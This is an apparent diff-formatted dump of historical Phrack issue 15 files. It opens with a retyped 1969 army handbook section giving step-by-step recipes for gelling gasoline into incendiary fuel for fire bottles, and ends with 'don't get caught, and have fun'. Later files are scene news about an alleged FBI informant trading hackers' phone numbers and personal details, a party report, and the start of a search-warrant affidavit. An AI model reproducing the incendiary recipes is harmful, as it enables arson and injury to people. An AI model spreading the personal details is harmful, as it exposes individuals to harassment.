A text phile typed by Elric of Imrryr from the book:
|
||||
Improvised Munitions Handbook (TM 31-210), published
|
||||
by the Dept of the Army, 1969.
|
||||
All information is provided only for information purposes
|
||||
only. Construction and/or use may violate local, state, and/or
|
||||
federal laws. (Unless your name is Ollie North)
|
||||
|
||||
|
||||
|
||||
Gelled or paste type fuels are often preferable to raw gasoline for
|
||||
use in incendiary devices such as fire bottles. This type fuel adheres more
|
||||
readily to the target and produces greater heat concentration.
|
||||
|
||||
Several methods are shown for gelling gasoline using commonly
|
||||
available materials. The methods are divided into the following categories
|
||||
based on the major ingredient:
|
||||
|
||||
1. Lye Systems
|
||||
|
||||
2. Lye-Alcohol Systems
|
||||
|
||||
3. Soap-Alcohol Systems
|
||||
|
||||
4. Egg White Systems
|
||||
|
||||
6. Wax Systems
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Lye Systems
|
||||
|
||||
Lye (also know as caustic soda or Sodium Hydroxide) can be used in
|
||||
combination with powdered rosin or castor oil to gel gasoline for use as a
|
||||
flame fuel which will adhere to target surfaces.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
MATERIALS REQUIRED:
|
||||
------------------
|
||||
|
||||
Parts by Volume Ingredient How Used Common Source
|
||||
--------------- ---------- -------- -------------
|
||||
|
||||
60 Gasoline Motor Fuel Gas station or motor vehicle
|
||||
|
||||
2 (flake) or Lye Drain cleaner, Food store or Drug store
|
||||
1 (powder) making of soap
|
||||
|
||||
15 Rosin Manufacturing Paint store, chemical supply
|
||||
Paint & Varnish house
|
||||
|
||||
or
|
||||
|
||||
Castor Oil Medicine Food and Drug stores
|
||||
|
||||
|
||||
PROCEDURE
|
||||
---------
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Make sure that there are no open flames in the area when mixing |
|
||||
|the flame fuel. NO SMOKING! |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
|
||||
CONTAINER.)
|
||||
|
||||
2. IF rosin is in cake form, crush into small pieces.
|
||||
|
||||
3. Add rosin or castor oil to the gasoline and stir for about five minutes to
|
||||
mix thoroughly.
|
||||
|
||||
4. In a second container (NOT ALUMINUM) add lye to an equal volume of water
|
||||
slowly with stirring.
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Lye solution can burn skin and destroy clothing. If any is |
|
||||
|spilled, wash away immediately with large quantities of water. |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
5. Add lye solution to the gasoline mix and stir until mixture thickens (about
|
||||
one minute).
|
||||
|
||||
NOTE: The sample will eventually thicken to a very firm paste. This can be
|
||||
thinned, if desired, by stirring in additional gasoline.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Lye-Alcohol Systems
|
||||
|
||||
Lye (also know as caustic soda or Sodium Hydroxide) can be used in
|
||||
combination with alcohol and any of several fats to gel gasoline for use as a
|
||||
flame fuel.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
MATERIALS REQUIRED:
|
||||
------------------
|
||||
|
||||
Parts by Volume Ingredient How Used Common Source
|
||||
--------------- ---------- -------- -------------
|
||||
|
||||
60 Gasoline Motor Fuel Gas station or motor vehicle
|
||||
|
||||
2 (flake) or Lye Drain cleaner, Food store or Drug store
|
||||
1 (powder) making of soap
|
||||
|
||||
3 Ethyl Alcohol Whiskey Liquor store
|
||||
Medicine Drug store
|
||||
|
||||
NOTE: Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
|
||||
for ethyl alcohol, but their use produces softer gels.
|
||||
|
||||
14 Tallow Food Fats rendered by cooking the
|
||||
Making of soap meat or suet of animals.
|
||||
|
||||
NOTE: The following can be substituted for the tallow:
|
||||
|
||||
(a) Wool grease (Lanolin) (very good) -- Fat extracted from sheep wool
|
||||
(b) Castor Oil (good)
|
||||
(c) Any vegetable oil (corn, cottonseed, peanut, linseed, etc.)
|
||||
(d) Any fish oil
|
||||
(e) Butter or oleo margarine
|
||||
|
||||
It is necessary when using substitutes (c) to (e) to double the given amount
|
||||
of fat and of lye for satisfactory body.
|
||||
|
||||
PROCEDURE
|
||||
---------
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Make sure that there are no open flames in the area when mixing |
|
||||
|the flame fuel. NO SMOKING! |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
1. Pour gasoline into jar, bottle or other container. (DO NOT USE AN ALUMINUM
|
||||
CONTAINER.)
|
||||
|
||||
2. Add tallow (or substitute) to the gasoline and stir for about 1/2 minute to
|
||||
dissolve fat.
|
||||
|
||||
3. Add alcohol to the gasoline mixture. Mix thoroughly.
|
||||
|
||||
4. In a separate container (NOT ALUMINUM) slowly add lye to an equal volume of
|
||||
water. Mixture should be stirred constantly while adding lye.
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Lye solution can burn skin and destroy clothing. If any is |
|
||||
|spilled, wash away immediately with large quantities of water. |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
5. Add lye solution to the gasoline mixture and stir occasionally until
|
||||
thickened (about 1/2 hour)
|
||||
|
||||
NOTE: The sample will eventually (1 to 2 days) thicken to a very firm paste.
|
||||
This can be thinned, if desired, by stirring in additional gasoline.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Soap-Alcohol System
|
||||
|
||||
Common household soap can be used in combination with alcohol to gel
|
||||
gasoline for use as a flame fuel which will adhere to target surfaces.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
MATERIALS REQUIRED:
|
||||
------------------
|
||||
|
||||
Parts by Volume Ingredient How Used Common Source
|
||||
--------------- ---------- -------- -------------
|
||||
|
||||
36 Gasoline Motor Fuel Gas station or motor vehicle
|
||||
|
||||
1 Ethyl Alcohol Whiskey Liquor store
|
||||
Medicine Drug store
|
||||
|
||||
NOTE: Methyl (wood) alcohol or isopropyl (rubbing) alcohol can be substituted
|
||||
for ethyl alcohol.
|
||||
|
||||
20 (powdered) or Laundry soap Washing clothes Stores
|
||||
28 (flake)
|
||||
|
||||
NOTE: Unless the word "soap" actually appears somewhere on the container or
|
||||
wrapper, a washing compound is probably a detergent. THESE CAN NOT BE USED.
|
||||
|
||||
|
||||
PROCEDURE
|
||||
---------
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Make sure that there are no open flames in the area when mixing |
|
||||
|the flame fuel. NO SMOKING! |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
1. If bar soap is used, carve into thin flakes using a knife.
|
||||
|
||||
2. Pour Alcohol and gasoline into a jar, bottle or other container and mix
|
||||
thoroughly.
|
||||
|
||||
3. Add soap powder or flakes to gasoline-alcohol mix and stir occasionally
|
||||
until thickened (about 15 minutes).
|
||||
|
||||
|
||||
|
||||
|
||||
Egg System
|
||||
|
||||
The white of any bird egg can be used to gel gasoline for use as a flame fuel.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
MATERIALS REQUIRED:
|
||||
------------------
|
||||
|
||||
Parts by Volume Ingredient How Used Common Source
|
||||
--------------- ---------- -------- -------------
|
||||
|
||||
85 Gasoline Motor Fuel Gas station or motor vehicle
|
||||
|
||||
14 Egg Whites Food Food store, farms
|
||||
|
||||
Any one of the following
|
||||
|
||||
1 Table Salt Food, industrial Sea Water, Natural brine,
|
||||
processes Food stores
|
||||
|
||||
3 Ground Coffee Food Food store
|
||||
|
||||
3 Dried Tea Food Food store
|
||||
Leaves
|
||||
|
||||
3 Cocoa Food Food store
|
||||
|
||||
2 Sugar Food Food store
|
||||
|
||||
1 Saltpeter Pyrotechnics Drug store
|
||||
(Niter) Explosives chemical supply store
|
||||
(Potassium Matches
|
||||
Nitrate) Medicine
|
||||
|
||||
1 Epsom salts Medicine Drug store, food store
|
||||
industrial
|
||||
processes
|
||||
|
||||
2 Washing soda Washing cleaner Food store
|
||||
(Sal soda) Medicine Drug store
|
||||
Photography Photo supply store
|
||||
|
||||
1 1/2 Baking soda Baking Food store
|
||||
Manufacturing: Drug store
|
||||
Beverages,
|
||||
Mineral waters,
|
||||
and Medicine
|
||||
|
||||
1 1/2 Aspirin Medicine Drug store
|
||||
Food store
|
||||
|
||||
|
||||
PROCEDURE
|
||||
---------
|
||||
|
||||
______________________________________________________________________________
|
||||
|CAUTION: Make sure that there are no open flames in the area when mixing |
|
||||
|the flame fuel. NO SMOKING! |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
1. Separate egg white from yolk. This can be done by breaking the egg into a
|
||||
dish and carefully removing the yolk with a spoon.
|
||||
|
||||
|
||||
______________________________________________________________________________
|
||||
|NOTE: DO NOT GET THE YELLOW EGG YOLK MIXED INTO THE EGG WHITE. If egg yolk|
|
||||
|gets into the egg white, discard the egg. |
|
||||
|----------------------------------------------------------------------------|
|
||||
|
||||
2. Pour egg white into a jar, bottle, or other container and add gasoline.
|
||||
|
||||
3. Add the salt (or other additive) to the mixture and stir occasionally until
|
||||
gel forms (about 5 to 10 minutes).
|
||||
|
||||
NOTE: A thicker flame fuel can be obtained by putting the capped jar in hot
|
||||
(65 C) water for about 1/2 hour and then letting them cool to room
|
||||
temperature. (DO NOT HEAT THE GELLED FUEL CONTAINING COFFEE).
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Wax System
|
||||
|
||||
Any of several common waxes can be used to gel gasoline for use as a
|
||||
flame fuel.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
MATERIALS REQUIRED:
|
||||
------------------
|
||||
|
||||
Parts by Volume Ingredient How Used Common Source
|
||||
--------------- ---------- -------- -------------
|
||||
|
||||
80 Gasoline Motor Fuel Gas station or motor vehicle
|
||||
|
||||
20 Wax Leather polish, Food store, drug store,
|
||||
(Ozocerite, sealing wax, department store
|
||||
Mineral wax, candles,
|
||||
fossil wax, waxed paper,
|
||||
ceresin wax furniture &
|
||||
beeswax) floor waxes,
|
||||
lithographing.
|
||||
|
||||
PROCEDURE
|
||||
---------
|
||||
|
||||
1. Melt the wax and pour into jar or bottle which has been placed in a hot
|
||||
water bath.
|
||||
|
||||
2. Add gasoline to the bottle.
|
||||
|
||||
3. When wax has completely dissolved in the gasoline, allow the water bath to
|
||||
cool slowly to room temperature.
|
||||
|
||||
NOTE: If a gel does not form, add additional wax (up to 40% by volume) and
|
||||
repeat the above steps. If no gel forms with 40% wax, make a Lye solution by
|
||||
dissolving a small amount of Lye (Sodium Hydroxide) in an equal amount of
|
||||
water. Add this solution (1/2% by volume) to the gasoline wax mix and shake
|
||||
bottle until a gel forms.
|
||||
|
||||
|
||||
|
||||
|
||||
Well, that's it, I omitted a few things because they where either redundant,
|
||||
or more aimed toward battle field conditions. Be careful, don't get caught,
|
||||
and have fun...
|
||||
|
||||
Elric of Imrryr
|
336
phrack15/6.txt
Normal file
336
phrack15/6.txt
Normal file
|
@ -0,0 +1,336 @@
|
|||
PWN ^*^ PWN ^*^ PWN { Final Issue } PWN ^*^ PWN ^*^ PWN
|
||||
^*^ ^*^
|
||||
PWN Phrack World News PWN
|
||||
^*^ Issue XV: Part One ^*^
|
||||
PWN PWN
|
||||
^*^ Created, Written, and Edited ^*^
|
||||
PWN by Knight Lightning PWN
|
||||
^*^ ^*^
|
||||
PWN ^*^ PWN ^*^ PWN { Final Issue } PWN ^*^ PWN ^*^ PWN
|
||||
|
||||
Welcome to my final issue of Phrack World News. Many people are wondering why
|
||||
I am giving it up. There are several reasons, but the most important is that
|
||||
I will be going to college and will have little (if any) time for the
|
||||
phreak/hack world or PWN. I doubt I will even be calling any bulletin boards,
|
||||
but I may make an occasional call to a few of my friends in the community.
|
||||
|
||||
The Phrack Inc. VMS is no longer in service and messages will not be received
|
||||
there by anyone. Phrack Inc. is now in the hands of Sir Francis Drake, Elric
|
||||
Of Imrryr, and Shooting Shark.
|
||||
|
||||
:Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
||||
Dan The Operator; Informant July 27, 1986
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
I'm going to assume that all of you have read PWN 14/2 and the details
|
||||
surrounding SummerCon '87.
|
||||
|
||||
This article will feature information collected from our investigation and
|
||||
quotes from the Noah Tape.
|
||||
|
||||
The tape actually has two parts. The front side has part of an Alliance
|
||||
Teleconference in which Noah attempted to gather information by engineering
|
||||
hackers. Side B contains 45 minutes of a conversation between Noah and John
|
||||
Maxfield of BoardScan, in which Noah tried to engineer Maxfield into giving
|
||||
him information on certain hackers by trading him information on other
|
||||
hackers. All of this has been going on for a long time although we are unsure
|
||||
as to how long and Noah was not exactly an informant for Maxfield, it was the
|
||||
FBI.
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Part One: Noah Engineers his "friends"
|
||||
|
||||
The Alliance teleconference recording has about 7 people on it, but the only
|
||||
people I recognized were Dan The Operator, Il Duce (Fiber Optic), Johnny
|
||||
Rotten, and The Ninja.
|
||||
|
||||
The topics discussed (mostly by Noah) included;
|
||||
|
||||
Bill From RNOC / Catch-22 / Doom Prophet / Force Hackers / John Maxfield
|
||||
Karl Marx / Legion of Doom / Lord Rebel / Neba / Phantom Phreaker
|
||||
Phucked Agent 04 / Silver Spy / SummerCon '87 / The Rebel / The Videosmith
|
||||
|
||||
|
||||
Here is a look at some of the conversation; [Il Duce=Mark]
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Noah: SILVER SPY, you know him?
|
||||
Mark: Yeah, what about him?
|
||||
Noah: Yeah, Paul.
|
||||
|
||||
[This was done to make it look like Noah knew him and was his buddy.-KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: Anyway, is LORD REBEL part of LOD?
|
||||
Mark: He's not really.
|
||||
Noah: I didn't think so.
|
||||
Mark: Well, he is, he is sort of.
|
||||
Noah: Ah, well what does he know.
|
||||
Mark: Not much.
|
||||
Noah: Why do they care about him, he's just a pirate.
|
||||
|
||||
[Look at this dork! First he tries to act like he knows everything and then
|
||||
when he realizes he screwed up, he tries to insult LORD REBEL's abilities.-KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: Who else is part of LOD that I missed?
|
||||
Mark: I don't know who you would have heard of.
|
||||
Noah: I've pretty much heard of everyone, I just can't think of anyone else.
|
||||
|
||||
[Yeah Noah, you are a regular best friend with everyone in LOD.-KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: Want to give out LORD REBEL's number?
|
||||
Mark: Everybody knows it already.
|
||||
Noah: What is it?
|
||||
Mark: Which one?
|
||||
Noah: Both, all.
|
||||
Mark: Want do you want to know for, don't you have it?
|
||||
Noah: Never bothered getting them. What do you got? Mark!
|
||||
Mark: Yeah.
|
||||
Noah: Do you have his number?
|
||||
Mark: Yeah.
|
||||
Noah: Well, what is it!?
|
||||
Mark: Why should I say?
|
||||
Noah: I dunno, you say everyone's got it.
|
||||
Mark: Yeah, so.
|
||||
Noah: So if everyone has it, you might as well give it to everybody.
|
||||
Mark: Not really, I wouldn't want to be the one to tell him that I gave out
|
||||
his number.
|
||||
Noah: Ok Mark, fine, it's no problem for me to get anyone's number. I got
|
||||
VIDEOSMITH's and SILVER SPY's, no problem. [Yeah right, see the other
|
||||
conversation with John Maxfield.-KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: CATCH-22 is supposed to be the most elite BBS in the United States.
|
||||
What do you think about that Mark?
|
||||
Mark: What?
|
||||
Noah: What do you think about that Mark?
|
||||
Mark: About what?
|
||||
Noah: About CATCH-22.
|
||||
Mark: What about it?
|
||||
Noah: (pause) Well.
|
||||
Mark: Its not the greatest board because it's not really that active.
|
||||
Noah: Right, but what do you think about it? Alright, first off here, first
|
||||
off, first off, do you have KARL MARX's number?
|
||||
Mark: What?
|
||||
Noah: I doubt you have KARL MARX's phone number.
|
||||
Mark: Ask me if I really care.
|
||||
Noah: I'm just wondering if YOU DO.
|
||||
Mark: It's one thing to have all these people's numbers, it's another if you
|
||||
are welcome to call them.
|
||||
Noah: Yeah (pause), well are you?
|
||||
Mark: Why should I say?
|
||||
Noah: I dunno, I dunno. I'm probably going to ask him anyways.
|
||||
|
||||
[I don't think my ragging is even necessary in this excerpt.-KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: Here is what MAXFIELD says, "You got the hackers, and then you got the
|
||||
people who want to make money off the hackers." Information shouldn't
|
||||
be free, you should find out things on your own.
|
||||
|
||||
[Give me a break Noah, you are the BIGGEST leach I have ever seen -KL]
|
||||
------------------------------------------------------------------------------
|
||||
One final note to make about the Alliance conversations is that halfway
|
||||
through, IL DUCE and DAN THE OPERATOR gave out BILL FROM RNOC's full name,
|
||||
phone number, address, etc.
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
Part Two: Noah Engineers John Maxfield
|
||||
|
||||
The list of topics discussed in this conversation is much longer;
|
||||
|
||||
Arthur Dent / Ben Casey / Big Brother / Bill From RNOC / BoardScan
|
||||
Captain Crunch / Celtic Phrost / Cheshire Catalyst / Doc Holiday / Easywriter
|
||||
Genghis Khan / Jenny Jaguar / Jester Sluggo / Karl Marx / Kerrang Khan
|
||||
Kloey Detect / Max Files / Noah Espert / Legion Of Doom / Legion of Hackers
|
||||
Lord Digital / Lord Rebel / Mark Tabas / Oryan QUEST / Phucked Agent 04
|
||||
Phrack Inc. / Pirate's Hangout / Septic Tank / Sigmund Fraud / The Disk Jockey
|
||||
The Executioner / The Federation / The *414* Wizard / The Hobbit
|
||||
The Marauder The Safecracker / The Telecom Security Group / The Videosmith
|
||||
The Weasel / Tommy Hawk / Torture Chamber / Twilight Zone / Tuc
|
||||
Violet Boregard / Zepplin
|
||||
|
||||
|
||||
The following are the highlights of the conversation between DAN THE OPERATOR
|
||||
and JOHN MAXFIELD. [John Maxfield = John]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: Did you ever find VIDEOSMITH's number?
|
||||
John: No, matter of fact. You know what it is, I've been on boards he's been
|
||||
on in the 215 NPA [possibly Atlantis], but well.
|
||||
Noah: But you don't have his number?
|
||||
John: Should I?
|
||||
Noah: He's fairly big, he knows his stuff. I would think he'd be worth
|
||||
getting a number for.
|
||||
John: Doesn't do anything for me because you know, just having his number
|
||||
doesn't get him in trouble or anything.
|
||||
Noah: Oh, well I don't want him to get in trouble...he's a nice person. So
|
||||
do you have LORD REBEL's phone number?
|
||||
John: What do you know about him?
|
||||
Noah: I think he's up in New York.
|
||||
John: 914?
|
||||
Noah: Possibly 718, 212, possibly even 201. [Excuse me you dork. The 201 NPA
|
||||
is in the state of New Jersey not New York. What a loser Noah is. -KL]
|
||||
John: If you don't have a number on him I'll have to do an alphabetical
|
||||
search for him. It takes a while.
|
||||
Noah: Well we could talk while it's going. I think you're pretty
|
||||
interesting, you're not boring like I am.
|
||||
John: Well you're not boring to me as long as I keep getting people's phone
|
||||
numbers. Bahahahahahahahahah Har har har.
|
||||
Noah: (Pause)(Pause)(Pause) Bahahahahahahaha. Sheesh.
|
||||
John: Well let's see what it finds, there's a lot of Lords in there.
|
||||
Noah: He's part of LOD.
|
||||
John: Oh he's part of LOD!?
|
||||
Noah: Yeah.
|
||||
John: Well I might have him and I might not [What a profound statement -KL].
|
||||
Noah: He's not very active in LOD.
|
||||
|
||||
[The search for LORD REBEL's information was a failure -KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: I got a question, I'm still trying to figure this out. Are there
|
||||
people like me who just call you up like this?
|
||||
John: Yes there are.
|
||||
Noah: A lot?
|
||||
John: Enough. You know it's funny, there's people that call up and there
|
||||
assholes and I'll just hang up on them. There is other people that
|
||||
call up and well you know they try to feed me bullshit, but at least
|
||||
they aren't being jerks about it.
|
||||
Noah: You think I'm feeding you bullshit?
|
||||
John: I dunno, maybe you are or maybe you aren't. What I'm saying is that
|
||||
there are people that behave like humans. So there are a few that call
|
||||
in.
|
||||
|
||||
You know when you're working with informants, you got different
|
||||
categories. You got informants you can trust and you got informants
|
||||
that well hold on a second. There are some informants, that they could
|
||||
tell me anything and I'd believe them. Ok, because I know them. Met
|
||||
them personally maybe or known the guy for 3 or 4 years, his
|
||||
information is always correct that sort of thing.
|
||||
|
||||
Then there is somebody like you that umm is kinda maybe a "Class 2
|
||||
Informant." Gives valid phone numbers and information out, but is not
|
||||
really a true informant. Then there is a "Class 3 Informant" that's
|
||||
like, ahh somebody like ORYAN QUEST who calls up and turns in somebody
|
||||
he doesn't like, but that's all he ever does. I don't know if you can
|
||||
call them Class 1, Class 2, Class 3 exactly but that's how I look at
|
||||
it.
|
||||
|
||||
[Shortly after this, Maxfield gave out JESTER SLUGGO's information -KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: How about Phucked Agent 04?
|
||||
John: Oh him, his name is XXXXX and he's out in XXXXXXX.
|
||||
Noah: Something like that.
|
||||
John: He's one of the jerks that made death threats against me. I kinda
|
||||
would like to get him.
|
||||
Noah: You want his number?
|
||||
John: Yeah.
|
||||
Noah: Lemme see if I can catch up with him, I know a few people in LOD.
|
||||
------------------------------------------------------------------------------
|
||||
[Noah tried to get information on KERRANG KHAN for a while and then started
|
||||
asking about KARL MARX -KL]
|
||||
|
||||
Noah: Ok, KARL MARX.
|
||||
John: Oh, he got busted along with MARK TABAS you know, I told you all about
|
||||
that.
|
||||
Noah: Yeah yeah.
|
||||
John: He lives out in NPA XXX, but he was going to college in XXXXXXXXXX and
|
||||
I don't have a number for him there.
|
||||
Noah: He's probably back home now.
|
||||
John: Yeah, but I probably shouldn't give out his number. He did get popped.
|
||||
Noah: Aw come on.
|
||||
John: Nah.
|
||||
Noah: Come on.
|
||||
John: Nah.
|
||||
Noah: Please.
|
||||
John: Nah. I probably don't have a correct number anyway.
|
||||
Noah: Dude. Well if you don't have a correct number then give me the old
|
||||
number.
|
||||
John: Nah.
|
||||
Noah: C'mon dude.
|
||||
John: Nah.
|
||||
Noah: Dude!
|
||||
John: Nah nah. Besides I have a feeling that he wouldn't appreciate being
|
||||
called up by hackers anyway.
|
||||
Noah: He's still around though!
|
||||
John: Is he!?
|
||||
Noah: Yes.
|
||||
John: Oh really.
|
||||
Noah: Yes sir. Because he was talking with THE MARAUDER, you know, Todd.
|
||||
John: Yeah?
|
||||
Noah: Yeah.
|
||||
John: That's interesting.
|
||||
|
||||
[They went on to discuss THE SAFECRAKER, THE SEPTIC TANK, THE TWILIGHT ZONE,
|
||||
TORTURE CHAMBER, and THE FEDERATION. Maxfield reveled that he had been on
|
||||
TWILIGHT ZONE back when THE MARAUDER used to run it. -KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah: THE MARAUDER is still home, he didn't go to college.
|
||||
John: Yeah, MARAUDER, now he is heavy duty.
|
||||
Noah: Yeah, he knows his snit (not a typo). However, he doesn't brag about
|
||||
it.
|
||||
John: Well the thing is, you know is what the hell is he trying to
|
||||
accomplish? I sometimes kinda wonder what motivates somebody like that.
|
||||
Noah: What do you mean?
|
||||
John: Well he wants to screw around with all this stuff, but what's the
|
||||
point?
|
||||
------------------------------------------------------------------------------
|
||||
SIGMUND FRAUD, MAX FILES, TOMMY HAWK, TUC, PHRACK INC., MARK TABAS, were next
|
||||
to be discussed. After which MAXFIELD went on to retell a story about a
|
||||
district attorney in California that referred to him as a legend in his own
|
||||
time. Noah then started asking about CAPTAIN CRUNCH and Easywriter, and
|
||||
Maxfield told him the story of CAPTAIN CRUNCH's latest bust.
|
||||
------------------------------------------------------------------------------
|
||||
THE DISK JOCKEY, DOC HOLIDAY, THE MARAUDER, BIG BROTHER, ARTHUR DENT, THE
|
||||
WEASEL, BILL FROM RNOC, THE 414 WIZARD, THE EXECUTIONER, and LORD DIGITAL were
|
||||
next.
|
||||
|
||||
Then it was Noah's turn to unload (although Noah had already given out
|
||||
information on many of the previously mentioned people).
|
||||
|
||||
TUC, THE TELECOM SECURITY GROUP, CELTIC PHROST, ZEPPLIN, and GENGHIS KHAN had
|
||||
their information handed out freely.
|
||||
|
||||
John: I guess I'm going to have the goons come over and pay you a visit.
|
||||
Noah: Who me?
|
||||
John: Take your computer, clean your room for you.
|
||||
Noah: No, no, please... don't... you can't do that. I'll be an informant
|
||||
dammit. I'll give you all my files, I'll send them immediately...
|
||||
Federal Express.
|
||||
John: Sounds good.
|
||||
Noah: Has anyone ever really done that?
|
||||
John: Well not by Federal Express.
|
||||
Noah: I'll send you all my manuals, everything. I'll even tell you my
|
||||
favorite Sprint code.
|
||||
John: Sprint would appreciate that. You know, it's interesting that you know
|
||||
MARAUDER.
|
||||
Noah: Todd and I, yeah, well we're on a first name basis. [Yeah you know his
|
||||
first name but that's as far as it goes, isn't it Noah. -KL]
|
||||
------------------------------------------------------------------------------
|
||||
Noah gave out more people's information and the conversation ran on for
|
||||
another 20 minutes. The problem is that this is when the tape ran out, but
|
||||
the conversation was going strong. Noah was giving out numbers alphabetically
|
||||
and he was still in the C-G area when the tape ran out. There is no telling
|
||||
as to what was discussed next.
|
||||
|
||||
All of the people mentioned at the beginning were discussed in depth and the
|
||||
excerpts shown here do not necessarily show the extent of the discussion. I
|
||||
didn't transcript the entire conversation because in doing so would publicly
|
||||
release information that would be unproductive to our society.
|
||||
|
||||
So, many of you are probably still asking yourself, where did we get the FBI
|
||||
connection from? Well, some time ago, DAN THE OPERATOR used to hang out with
|
||||
THE TRADER and they were into some kind of stock fraud using Bank Americard or
|
||||
something along those lines. Something went wrong and Noah was visited by the
|
||||
FBI. As it turns out, Noah became their informant and they dropped the
|
||||
charges.
|
||||
|
||||
Sometime later, Noah tried to set up TERMINUS (see the current Phrack
|
||||
Pro-Phile) to meet (unknowingly) with the FBI and give them a tour of his
|
||||
board, TERMINUS realized what was going on and Noah's plans were ruined.
|
||||
|
||||
I hope you learned from this story, don't let yourself be maneuvered by people
|
||||
like Noah. There are more informants out there than you think.
|
||||
|
||||
Written by Knight Lightning
|
||||
|
||||
For more information about DAN THE OPERATOR, you should read THE SYNDICATE
|
||||
REPORTS Transmittal No. 13 by THE SENSEI. Available on finer BBSes/AEs
|
||||
everywhere.
|
||||
______________________________________________________________________________
|
||||
|
45
phrack15/7.txt
Normal file
45
phrack15/7.txt
Normal file
|
@ -0,0 +1,45 @@
|
|||
PartyCon '87 July 24-26, 1987
|
||||
~~~~~~~~~~~~
|
||||
This article is not meant to be as in depth as the SummerCon issue, but I
|
||||
think you'll enjoy it.
|
||||
|
||||
Before we begin, here is a list of the total phreak/hack attendees;
|
||||
|
||||
Cheap Shades / Control C / Forest Ranger / Knight Lightning / Loki
|
||||
Lucifer 666 / Mad Hatter / Sir William / Synthetic Slug / Taran King
|
||||
The Cutthroat / The Disk Jockey / The Mad Hacker
|
||||
|
||||
Other people who attended that should be made a note of include; Dan and Jeff
|
||||
(Two of Control C's roommates that were pretty cool), Dennis (The Menace); one
|
||||
of Control C's neighbors, Connie; The Mad Hacker's girlfriend (at the time
|
||||
anyway), and the United States Secret Service; they weren't actually at
|
||||
PartyCon, but they kept a close watch from a distance.
|
||||
|
||||
For me, it started Friday morning when Cheap Shades and I met Forest Ranger
|
||||
and Taran King at Taran's house. Our trip took us through Illinois, and we
|
||||
stopped off at a Burger King in Normal, Illinois (close to Illinois State
|
||||
University). Would you believe that the majority of the population there had
|
||||
no teeth?
|
||||
|
||||
Anyway, our next stop was to see Lucifer 666 in his small one-horse town. He
|
||||
would follow us later (with Synthetic Slug). We arrived at Control C's
|
||||
apartment around 4 PM and found Mad Hatter alone. The first thing he made a
|
||||
note of was some sheets of paper he discovered (while searching ^C's
|
||||
apartment). I won't go into what was on the paper. Although we didn't know
|
||||
it at the time, he copied the papers and hid them in his bag. It is believed
|
||||
that he intended to plant this and other information inside the apartment so
|
||||
that ^C would get busted.
|
||||
|
||||
Basically, it was a major party with a few mishaps like Forest Ranger and
|
||||
Cheap Shades driving into Grand Rapids, Michigan on Friday night and not
|
||||
getting back till 4 AM Saturday. We hit Lake Shore Drive, the beach, a few
|
||||
shopping malls, Chicago's Hard Rock Cafe, and Rush Street. It was a lot of
|
||||
fun and we may do it again sometime soon.
|
||||
|
||||
If you missed PartyCon '87, you missed out. For those who wanted to go, but
|
||||
couldn't find us, we're sorry. Hotel cancellations and loss of phone lists
|
||||
due to current problems made it impossible for us to contact everyone.
|
||||
|
||||
Written by Knight Lightning
|
||||
______________________________________________________________________________
|
||||
|
137
phrack15/8.txt
Normal file
137
phrack15/8.txt
Normal file
|
@ -0,0 +1,137 @@
|
|||
#### PHRACK PRESENTS ISSUE 15 ####
|
||||
|
||||
^*^*^*^Phrack World News, Part 1^*^*^*^
|
||||
|
||||
**** File 8 of 10 ****
|
||||
|
||||
|
||||
|
||||
SEARCH WARRANT ON WRITTEN AFFIDAVIT
|
||||
|
||||
DATE: 7/17/87
|
||||
|
||||
TO: Special Agent Lewis F. Jackson II, U.S. Secret Service or any agent d use
|
||||
of access devices, and Title 18 USC 1030 - Computer related fraud.
|
||||
|
||||
WHEN: On or before (10 days) at any time day or night
|
||||
|
||||
------------
|
||||
|
||||
AFFIDAVIT
|
||||
|
||||
"I, Lewis F. Jackson II, first being duly sworn, do depose and state:..."
|
||||
|
||||
[Here he goes on and on about his position in the San Jose Secret Service,
|
||||
classes he has taken (none of them having to do with computers)]
|
||||
|
||||
"Other individuals involved in the investigation:
|
||||
|
||||
Detective J. McMullen - Stanford Public Safety/Specialist in computers
|
||||
Steve Daugherty - Pacific Bell Telephone (sic)/ Specialist in fraud
|
||||
